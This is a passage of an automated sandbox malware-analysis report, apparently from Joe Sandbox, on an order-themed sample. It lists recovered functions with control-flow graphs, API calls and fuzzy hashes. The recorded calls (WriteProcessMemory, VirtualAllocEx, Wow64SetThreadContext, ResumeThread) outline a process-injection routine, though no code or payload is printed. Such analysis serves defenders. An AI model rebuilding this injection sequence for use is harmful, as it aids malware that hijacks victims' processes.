                                                                            control_flow_graph 222 fc8e34-fc8e3e 223 fc8e40-fc8f01 CreateActCtxA 222->223 225 fc8f0a-fc8f64 223->225 226 fc8f03-fc8f09 223->226 233 fc8f66-fc8f69 225->233 234 fc8f73-fc8f77 225->234 226->225 233->234 235 fc8f88 234->235 236 fc8f79-fc8f85 234->236 238 fc8f89 235->238 236->235 238->238
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00FC8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 8c2949a48c139432747dc9c98324b71936fa7a6a9bcd48ba7867a2e0fb7359a2
                                                                            • Instruction ID: 3e15e4f06f2220b26adcd5f1a2255c7875a066bef06b8b073088e15247e354a0
                                                                            • Opcode Fuzzy Hash: 8c2949a48c139432747dc9c98324b71936fa7a6a9bcd48ba7867a2e0fb7359a2
                                                                            • Instruction Fuzzy Hash: D941C274C00719CFEB24CFA9C845B8EBBB6BF49714F24806ED408AB251DB756946CF91
                                                                            Function 05042E5C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 239 5042e5c-50477fc 242 5047802-5047807 239->242 243 50478ac-50478cc call 5042d34 239->243 245 5047809-5047840 242->245 246 504785a-5047892 CallWindowProcW 242->246 250 50478cf-50478dc 243->250 253 5047842-5047848 245->253 254 5047849-5047858 245->254 247 5047894-504789a 246->247 248 504789b-50478aa 246->248 247->248 248->250 253->254 254->250
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05047881
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 710df3052b6f361d1eb9a5e0f07a12402e5e8a4ef4333a7acd28c7f0dae39ce5
                                                                            • Instruction ID: 4d24cd22774a216aeb38790e9b36f762491eb0ba89477604a90cdbcae2eb6c31
                                                                            • Opcode Fuzzy Hash: 710df3052b6f361d1eb9a5e0f07a12402e5e8a4ef4333a7acd28c7f0dae39ce5
                                                                            • Instruction Fuzzy Hash: 4C4119B9A003059FDB14CF99D888AAEBBF5FF88314F24845DD519A7321D374A845CFA0
                                                                            Function 00FC79DC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 256 fc79dc-fc8f01 CreateActCtxA 259 fc8f0a-fc8f64 256->259 260 fc8f03-fc8f09 256->260 267 fc8f66-fc8f69 259->267 268 fc8f73-fc8f77 259->268 260->259 267->268 269 fc8f88 268->269 270 fc8f79-fc8f85 268->270 272 fc8f89 269->272 270->269 272->272
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00FC8EF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 49b76826342802dd59b4e871e408c3869dd886dd4176cc1184e086e4e702d833
                                                                            • Instruction ID: 3913130fd67d896c61ce552968b74a8e430ef2a700f2bc57db4220f40c4a64cb
                                                                            • Opcode Fuzzy Hash: 49b76826342802dd59b4e871e408c3869dd886dd4176cc1184e086e4e702d833
                                                                            • Instruction Fuzzy Hash: DF41D474C00719CFDB24CFA9C944B8EBBB6BF49704F20806ED408AB251DB756946CF90
                                                                            Function 0980B1D1 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 273 980b1d1-980b226 275 980b236-980b275 WriteProcessMemory 273->275 276 980b228-980b234 273->276 278 980b277-980b27d 275->278 279 980b27e-980b2ae 275->279 276->275 278->279
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0980B268
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 6f23225f2c5fbd37ed6a5aa382cb9309597079029548d2342b9a537fab6012e7
                                                                            • Instruction ID: 060206e6ba46bfbdd25a6774ad83d0365b982f0f5cd53eaad3a6801dd16ce080
                                                                            • Opcode Fuzzy Hash: 6f23225f2c5fbd37ed6a5aa382cb9309597079029548d2342b9a537fab6012e7
                                                                            • Instruction Fuzzy Hash: DB2113719003499FDF50DFAAC885BEEBBF5FF88310F10842AE919A7250D7789954CBA4
                                                                            Function 0980B1D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 283 980b1d8-980b226 285 980b236-980b275 WriteProcessMemory 283->285 286 980b228-980b234 283->286 288 980b277-980b27d 285->288 289 980b27e-980b2ae 285->289 286->285 288->289
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0980B268
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 7c7e80ebc10c9994d9856100105a7e60cc35983534d8deb5137ef606b10ec103
                                                                            • Instruction ID: efb1fab50e116cd957301ec55661f6bb7ede45ea82cbd449c19ae792569896ad
                                                                            • Opcode Fuzzy Hash: 7c7e80ebc10c9994d9856100105a7e60cc35983534d8deb5137ef606b10ec103
                                                                            • Instruction Fuzzy Hash: C52125719003499FDF10DFAAC885BDEBBF5FF88310F10842AE918A7250D7789944CBA4
                                                                            Function 0980AC30 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 293 980ac30-980ac83 295 980ac93-980acc3 Wow64SetThreadContext 293->295 296 980ac85-980ac91 293->296 298 980acc5-980accb 295->298 299 980accc-980acfc 295->299 296->295 298->299
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0980ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 1240de2cc133a0bc532ae68f6c80301efa70b1f22d3a7fbc4195a37b1c8a713a
                                                                            • Instruction ID: 7d543b004e1b292d08f85df37c64c9ed55cd90eb14c6d4bb9fc5d0fa2d150f62
                                                                            • Opcode Fuzzy Hash: 1240de2cc133a0bc532ae68f6c80301efa70b1f22d3a7fbc4195a37b1c8a713a
                                                                            • Instruction Fuzzy Hash: BB2116719003098FDB54DFAAC884BEEBBF5EF88220F548429E519A7380C7789945CFA4
                                                                            Function 0980B2C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 303 980b2c1-980b355 ReadProcessMemory 306 980b357-980b35d 303->306 307 980b35e-980b38e 303->307 306->307
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0980B348
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 3b420fb0c99dc5ddf2d990a3c6a964a0bf09f978c9a76733b9db7fdce408d62b
                                                                            • Instruction ID: 80e8dd28d1aa7fcb89ee66d912d26f86343bdcf1ad09c21f638cb8b445d70c29
                                                                            • Opcode Fuzzy Hash: 3b420fb0c99dc5ddf2d990a3c6a964a0bf09f978c9a76733b9db7fdce408d62b
                                                                            • Instruction Fuzzy Hash: FF2105718003599FDB10DFAAC884BEEFBF5FF48320F10842AE518A7290D7799945CBA4
                                                                            Function 05041068 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 311 5041068-5041104 DuplicateHandle 312 5041106-504110c 311->312 313 504110d-504112a 311->313 312->313
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050410F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 182489757f00127c3224c17eb236d425a39fa2c1c21bc1943edb616f5f3a1ee1
                                                                            • Instruction ID: b45b5b4f13f5c3d879c1ab8357c85a7e83221c788a2d652ee0c0430f7db2035b
                                                                            • Opcode Fuzzy Hash: 182489757f00127c3224c17eb236d425a39fa2c1c21bc1943edb616f5f3a1ee1
                                                                            • Instruction Fuzzy Hash: 9F21B0B5900249DFDB10CFAAD584AEEBBF9FB48310F14841AE918A7250D378A995CF64
                                                                            Function 0980AC38 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0980ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 4f22adcb20893002d6d0b058cce6035b8df544a16cc40fb96793da6b042ef1be
                                                                            • Instruction ID: 94a6c6214845b2dc58cc1f2eccba2e187ed409cf6f6e43094a29eeb6b4581116
                                                                            • Opcode Fuzzy Hash: 4f22adcb20893002d6d0b058cce6035b8df544a16cc40fb96793da6b042ef1be
                                                                            • Instruction Fuzzy Hash: AD2107719003098FDB54DFAAC8857EEBBF9EF88224F148429D519A7340DB789945CFA4
                                                                            Function 0980B2C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0980B348
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 78966bbfb8300c4873c5c6cad384cfa6594756e498120373f4d78181c802f52d
                                                                            • Instruction ID: 7830c550971a6e0e809b5720c61299bcd00ba3ab2a7bc86192e177eec1ddbbdd
                                                                            • Opcode Fuzzy Hash: 78966bbfb8300c4873c5c6cad384cfa6594756e498120373f4d78181c802f52d
                                                                            • Instruction Fuzzy Hash: CF2128718003499FDB10DFAAC844BDEBBF5FF48320F10842EE518A7240C7799944CBA4
                                                                            Function 05041070 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 050410F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 450323c39e526e0d3a40bd030f74e363ecdf34e2067b419f40e2b97387ecd0ea
                                                                            • Instruction ID: c0bbc0dbdd85a880c3ce76751fbe8176dadf0a08feb365eb4048f8ea8c07a0c5
                                                                            • Opcode Fuzzy Hash: 450323c39e526e0d3a40bd030f74e363ecdf34e2067b419f40e2b97387ecd0ea
                                                                            • Instruction Fuzzy Hash: DB21C4B59003489FDB10CFAAD884ADEBBF9FB48310F14841AE914A3350D379A954CFA5
                                                                            Function 0980B100 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0980B186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1c03e6a2d82b8f46c89446ad20c8b23ab61b6fb1c9d1906ae6f17d4e2a90ad66
                                                                            • Instruction ID: ac38deda1530011f46f9ecaf60eac8f7efeb5441c64b8f73d38375d57e0e4f4e
                                                                            • Opcode Fuzzy Hash: 1c03e6a2d82b8f46c89446ad20c8b23ab61b6fb1c9d1906ae6f17d4e2a90ad66
                                                                            • Instruction Fuzzy Hash: 412136718003499FDB10DFAAD844BDEBBF5EF88320F14841AE515A7250C7799954CFA1
                                                                            Function 0980B118 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0980B186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 31fb5701fada1f8f3d770c3db8e29eda90b77e6f0964776b854e4f6dfe4876cf
                                                                            • Instruction ID: cd3870a88de946fa474f8e7275364026486ac7dadbbdf32da63ae1cb35ba47ca
                                                                            • Opcode Fuzzy Hash: 31fb5701fada1f8f3d770c3db8e29eda90b77e6f0964776b854e4f6dfe4876cf
                                                                            • Instruction Fuzzy Hash: 8F11F3729003499FDB10DFAAC844BDEBBF5EF88720F148819E519A7250CB79A954CFA4
                                                                            Function 0980AB80 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: d34d6cc9d3c6631e35f68fb9825b2e2acd9aaa0a9d93d9f32aae9391cadeb772
                                                                            • Instruction ID: db210d34d49fe4bdc0d686f417bc08d724934c09aca0ca5825ed5ec5e24d6ecd
                                                                            • Opcode Fuzzy Hash: d34d6cc9d3c6631e35f68fb9825b2e2acd9aaa0a9d93d9f32aae9391cadeb772
                                                                            • Instruction Fuzzy Hash: D31119719003498FDB24DFAAC8487DEFBF5EF88720F148419D519A7640C779A944CFA4
                                                                            Function 0980AB88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: f20aadffe9a42d4c400431e5265c69207c43bfbe8ee4aa4750cac97f98137b46
                                                                            • Instruction ID: 6956e3ceeead2cedb581f33431ce234d446c8d39ba9ae404a6118d8a12ca9838
                                                                            • Opcode Fuzzy Hash: f20aadffe9a42d4c400431e5265c69207c43bfbe8ee4aa4750cac97f98137b46
                                                                            • Instruction Fuzzy Hash: 96110A719007488FDB14DFAAC8497DEFBF9EF88724F248419D519A7240CB79A944CFA4
                                                                            Function 0980F328 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0980F38D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 09c1027453df0707d0e10948cebea80f8a3c66e511f523a5e194d38c39a66daf
                                                                            • Instruction ID: 5e6484a7f33a2c81dfeb38d39f66911ced5431e444c324fa24e23fbdb5879f2f
                                                                            • Opcode Fuzzy Hash: 09c1027453df0707d0e10948cebea80f8a3c66e511f523a5e194d38c39a66daf
                                                                            • Instruction Fuzzy Hash: 5F1106B58003499FDB10DF9AD849BDEFBF4EB49320F10845AE558A7240C379A544CFA1
                                                                            Function 0980ADF4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0980F38D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 2c6ff30faea4034490f833ca22b0f75139965f64316971501272d23767a62549
                                                                            • Instruction ID: 98658589813741472dc61737742adf2ad72b0203dcf82b25873348e7f37076f1
                                                                            • Opcode Fuzzy Hash: 2c6ff30faea4034490f833ca22b0f75139965f64316971501272d23767a62549
                                                                            • Instruction Fuzzy Hash: FB11D6B58003499FDB60DF9AD845BDEBBF8EB48324F10841DE654A7340D379A944CFA5
                                                                            Function 00FCEBD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCEC3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 1e0eff3c9e181edf999f595854132bbb95d9c48e21375ba76547f73d80e36b8f
                                                                            • Instruction ID: 23886bdc0f1aa914d532d1bbcac62c8ca05cc5e1c7d4e3237fd508d33f59d808
                                                                            • Opcode Fuzzy Hash: 1e0eff3c9e181edf999f595854132bbb95d9c48e21375ba76547f73d80e36b8f
                                                                            • Instruction Fuzzy Hash: 9A1110B5C003498FDB10CF9AC545BDEFBF5EB88324F10841AD419A7200C379A549CFA1
                                                                            Function 00F6D3D8 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10e71cfd1e3e4de4ea4c7a5df76dc12425765b6ec1c1102b0fd77346cdda6fc2
                                                                            • Instruction ID: 12b042d93990e8e4210a1caf796413ffcdb0d50855cfa8d88e32a2bd2da94c64
                                                                            • Opcode Fuzzy Hash: 10e71cfd1e3e4de4ea4c7a5df76dc12425765b6ec1c1102b0fd77346cdda6fc2
                                                                            • Instruction Fuzzy Hash: ED2125B2A00344DFDB14DF10D9C0F16BB65FB98324F24C169E8090B256C73AEC56EBA2
                                                                            Function 00F7D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447707955.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f7d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 77e80984591c07ec7a68bb68b0141c75b717573e13d0089d1fb2bc43fe7daf41
                                                                            • Instruction ID: f5e0cf982e6cb63033e32e76f1670e9ee8fe2cb148a20be41f40ce0954781ff8
                                                                            • Opcode Fuzzy Hash: 77e80984591c07ec7a68bb68b0141c75b717573e13d0089d1fb2bc43fe7daf41
                                                                            • Instruction Fuzzy Hash: 3921FF72A043009FDB14DF10D980B16BB71EF84324F60C56AD80E0B28AC33AD806EA62
                                                                            Function 00F7D005 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447707955.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f7d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5fb28aadd9650ae05993c4ec15d9b1d8711f8adf1bfcfd7e3756bd21d8dd1c92
                                                                            • Instruction ID: 8ad830a006f3666efada6b05bdb77c78bfab66bc01118d86643f79f2c17f6596
                                                                            • Opcode Fuzzy Hash: 5fb28aadd9650ae05993c4ec15d9b1d8711f8adf1bfcfd7e3756bd21d8dd1c92
                                                                            • Instruction Fuzzy Hash: 9A2150755093808FCB12CF24D994715BF71EF46314F28C5EBD8498B6A7C33A984ADB62
                                                                            Function 00F6D3D3 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction ID: b8c5df88c65d7372ea7d6ba01e541c916ea971e99effd01fd1d43a73613fb83b
                                                                            • Opcode Fuzzy Hash: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction Fuzzy Hash: 8911E6B6904240DFCB15CF10D5C4B16BF72FB94324F24C6A9D8494B657C33AE856DBA1
                                                                            Function 00F6D731 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 363acdb204a041e328941ae4a67297e6b7b38cd46a79f59b99add56046035aab
                                                                            • Instruction ID: f9dfaad85d86268b648982a0ac07e17f73c5ba15cb50ff870cd3c738e1412782
                                                                            • Opcode Fuzzy Hash: 363acdb204a041e328941ae4a67297e6b7b38cd46a79f59b99add56046035aab
                                                                            • Instruction Fuzzy Hash: CE01A771E047449FE7108A25CD84B66FBD8EF81734F18C469ED094A182D3789844DAB3
                                                                            Function 00F6D730 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447659503.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f6d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee9b4768fd20b9359a984be7911dcf2f0872b772fee65d3da9c6ca2232b8530
                                                                            • Instruction ID: 1cff7752ca3f34fbf0e78512f6baa0a261c55346baebb3991df78c23fb5e472d
                                                                            • Opcode Fuzzy Hash: 7ee9b4768fd20b9359a984be7911dcf2f0872b772fee65d3da9c6ca2232b8530
                                                                            • Instruction Fuzzy Hash: 7BF06D72904344AFE7208A16CD84B66FFE8EB91734F18C55AED084F282D2799C44CAB2

                                                                            Non-executed Functions

                                                                            Function 00FC35D0 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +`#
                                                                            • API String ID: 0-2200946960
                                                                            • Opcode ID: 3a23b27409694ab17282bd2e904df8a1091f9ff1740ef1bca3ab8514bd34d89a
                                                                            • Instruction ID: cac79348f715ec0ddc86035e98947306c30c850d20c3a1a2fcb16e7421a92e3d
                                                                            • Opcode Fuzzy Hash: 3a23b27409694ab17282bd2e904df8a1091f9ff1740ef1bca3ab8514bd34d89a
                                                                            • Instruction Fuzzy Hash: 1361FA72A142479FC700CFA9CA42B9AFBB5BF89350B15C42BD445EB351C630CA05E791
                                                                            Function 00FC3378 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
